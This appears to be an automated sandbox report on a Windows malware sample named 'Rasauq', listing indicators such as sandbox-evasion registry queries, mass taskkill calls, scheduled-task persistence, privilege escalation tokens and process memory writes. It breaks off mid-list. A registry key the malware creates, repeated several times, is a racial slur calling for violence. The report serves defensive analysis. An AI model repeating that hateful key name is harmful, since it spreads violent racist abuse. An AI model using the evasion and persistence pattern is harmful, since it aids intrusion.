\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 1792 timeout.exe 4648 timeout.exe 5872 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 36 IoCs
pid Process 5352 taskkill.exe 4400 taskkill.exe 1780 taskkill.exe 2932 taskkill.exe 3152 taskkill.exe 5432 taskkill.exe 2468 taskkill.exe 5052 taskkill.exe 1064 taskkill.exe 5240 taskkill.exe 3500 taskkill.exe 5932 taskkill.exe 5420 taskkill.exe 2968 taskkill.exe 252 taskkill.exe 5212 taskkill.exe 4168 taskkill.exe 2796 taskkill.exe 3416 taskkill.exe 4324 taskkill.exe 4936 taskkill.exe 1284 taskkill.exe 4180 taskkill.exe 4932 taskkill.exe 5420 taskkill.exe 3940 taskkill.exe 544 taskkill.exe 2528 taskkill.exe 312 taskkill.exe 4716 taskkill.exe 1680 taskkill.exe 3604 taskkill.exe 6088 taskkill.exe 1660 taskkill.exe 2532 taskkill.exe 1712 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Software reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion reg.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT reg.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE reg.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes reg.exe Key created \REGISTRY\USER\.DEFAULT reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ reg.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133866985932942743" msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT reg.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Software reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Software reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers reg.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers reg.exe Key created \REGISTRY\USER\S-1-5-20 reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing reg.exe Key created \REGISTRY\USER\S-1-5-20 reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows reg.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform reg.exe -
Modifies registry class 62 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK reg.exe Key created \Registry\User\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Software reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2123103809-19148277-2527443841-1000\{F07D32D2-6125-44D8-A24B-3ABE4E7DD8B6} msedge.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5436 schtasks.exe 1556 schtasks.exe 5108 schtasks.exe 3144 schtasks.exe 1988 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4940 powershell.exe 4940 powershell.exe 5056 powershell.exe 2648 powershell.exe 5056 powershell.exe 2648 powershell.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 240 powershell.exe 240 powershell.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 412 powershell.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 412 powershell.exe 2324 sRasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 1868 powershell.exe 1868 powershell.exe 6088 powershell.exe 6088 powershell.exe 4048 powershell.exe 4048 powershell.exe 5372 powershell.exe 5372 powershell.exe 2044 powershell.exe 2044 powershell.exe 3028 powershell.exe 3028 powershell.exe 5436 powershell.exe 5436 powershell.exe 2600 powershell.exe 2600 powershell.exe 2892 powershell.exe 2892 powershell.exe 5336 powershell.exe 5336 powershell.exe 3448 powershell.exe 3448 powershell.exe 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 396 Process not Found 396 Process not Found 2132 msedge.exe 2132 msedge.exe 2132 msedge.exe 2132 msedge.exe 2132 msedge.exe 2132 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
pid Process 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe 3772 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3056 Rasauq SoftWorks.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeDebugPrivilege 5056 powershell.exe Token: SeDebugPrivilege 2648 powershell.exe Token: SeBackupPrivilege 1928 vssvc.exe Token: SeRestorePrivilege 1928 vssvc.exe Token: SeAuditPrivilege 1928 vssvc.exe Token: SeIncreaseQuotaPrivilege 4940 powershell.exe Token: SeSecurityPrivilege 4940 powershell.exe Token: SeTakeOwnershipPrivilege 4940 powershell.exe Token: SeLoadDriverPrivilege 4940 powershell.exe Token: SeSystemProfilePrivilege 4940 powershell.exe Token: SeSystemtimePrivilege 4940 powershell.exe Token: SeProfSingleProcessPrivilege 4940 powershell.exe Token: SeIncBasePriorityPrivilege 4940 powershell.exe Token: SeCreatePagefilePrivilege 4940 powershell.exe Token: SeBackupPrivilege 4940 powershell.exe Token: SeRestorePrivilege 4940 powershell.exe Token: SeShutdownPrivilege 4940 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeSystemEnvironmentPrivilege 4940 powershell.exe Token: SeRemoteShutdownPrivilege 4940 powershell.exe Token: SeUndockPrivilege 4940 powershell.exe Token: SeManageVolumePrivilege 4940 powershell.exe Token: 33 4940 powershell.exe Token: 34 4940 powershell.exe Token: 35 4940 powershell.exe Token: 36 4940 powershell.exe Token: SeDebugPrivilege 2324 sRasauq SoftWorks.exe Token: SeDebugPrivilege 240 powershell.exe Token: SeIncreaseQuotaPrivilege 240 powershell.exe Token: SeSecurityPrivilege 240 powershell.exe Token: SeTakeOwnershipPrivilege 240 powershell.exe Token: SeLoadDriverPrivilege 240 powershell.exe Token: SeSystemProfilePrivilege 240 powershell.exe Token: SeSystemtimePrivilege 240 powershell.exe Token: SeProfSingleProcessPrivilege 240 powershell.exe Token: SeIncBasePriorityPrivilege 240 powershell.exe Token: SeCreatePagefilePrivilege 240 powershell.exe Token: SeBackupPrivilege 240 powershell.exe Token: SeRestorePrivilege 240 powershell.exe Token: SeShutdownPrivilege 240 powershell.exe Token: SeDebugPrivilege 240 powershell.exe Token: SeSystemEnvironmentPrivilege 240 powershell.exe Token: SeRemoteShutdownPrivilege 240 powershell.exe Token: SeUndockPrivilege 240 powershell.exe Token: SeManageVolumePrivilege 240 powershell.exe Token: 33 240 powershell.exe Token: 34 240 powershell.exe Token: 35 240 powershell.exe Token: 36 240 powershell.exe Token: SeDebugPrivilege 412 powershell.exe Token: SeIncreaseQuotaPrivilege 412 powershell.exe Token: SeSecurityPrivilege 412 powershell.exe Token: SeTakeOwnershipPrivilege 412 powershell.exe Token: SeLoadDriverPrivilege 412 powershell.exe Token: SeSystemProfilePrivilege 412 powershell.exe Token: SeSystemtimePrivilege 412 powershell.exe Token: SeProfSingleProcessPrivilege 412 powershell.exe Token: SeIncBasePriorityPrivilege 412 powershell.exe Token: SeCreatePagefilePrivilege 412 powershell.exe Token: SeBackupPrivilege 412 powershell.exe Token: SeRestorePrivilege 412 powershell.exe Token: SeShutdownPrivilege 412 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 5056 powershell.exe 2648 powershell.exe 3772 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 60 wrote to memory of 3056 60 Rasauq Launcher.exe 84 PID 60 wrote to memory of 3056 60 Rasauq Launcher.exe 84 PID 60 wrote to memory of 2324 60 Rasauq Launcher.exe 85 PID 60 wrote to memory of 2324 60 Rasauq Launcher.exe 85 PID 60 wrote to memory of 988 60 Rasauq Launcher.exe 86 PID 60 wrote to memory of 988 60 Rasauq Launcher.exe 86 PID 988 wrote to memory of 4776 988 cmd.exe 88 PID 988 wrote to memory of 4776 988 cmd.exe 88 PID 988 wrote to memory of 2820 988 cmd.exe 89 PID 988 wrote to memory of 2820 988 cmd.exe 89 PID 988 wrote to memory of 4732 988 cmd.exe 90 PID 988 wrote to memory of 4732 988 cmd.exe 90 PID 988 wrote to memory of 4736 988 cmd.exe 91 PID 988 wrote to memory of 4736 988 cmd.exe 91 PID 3056 wrote to memory of 4940 3056 Rasauq SoftWorks.exe 94 PID 3056 wrote to memory of 4940 3056 Rasauq SoftWorks.exe 94 PID 4732 wrote to memory of 4936 4732 cmd.exe 96 PID 4732 wrote to memory of 4936 4732 cmd.exe 96 PID 4736 wrote to memory of 4976 4736 cmd.exe 97 PID 4736 wrote to memory of 4976 4736 cmd.exe 97 PID 4732 wrote to memory of 5056 4732 cmd.exe 99 PID 4732 wrote to memory of 5056 4732 cmd.exe 99 PID 4736 wrote to memory of 2648 4736 cmd.exe 101 PID 4736 wrote to memory of 2648 4736 cmd.exe 101 PID 4736 wrote to memory of 5240 4736 cmd.exe 105 PID 4736 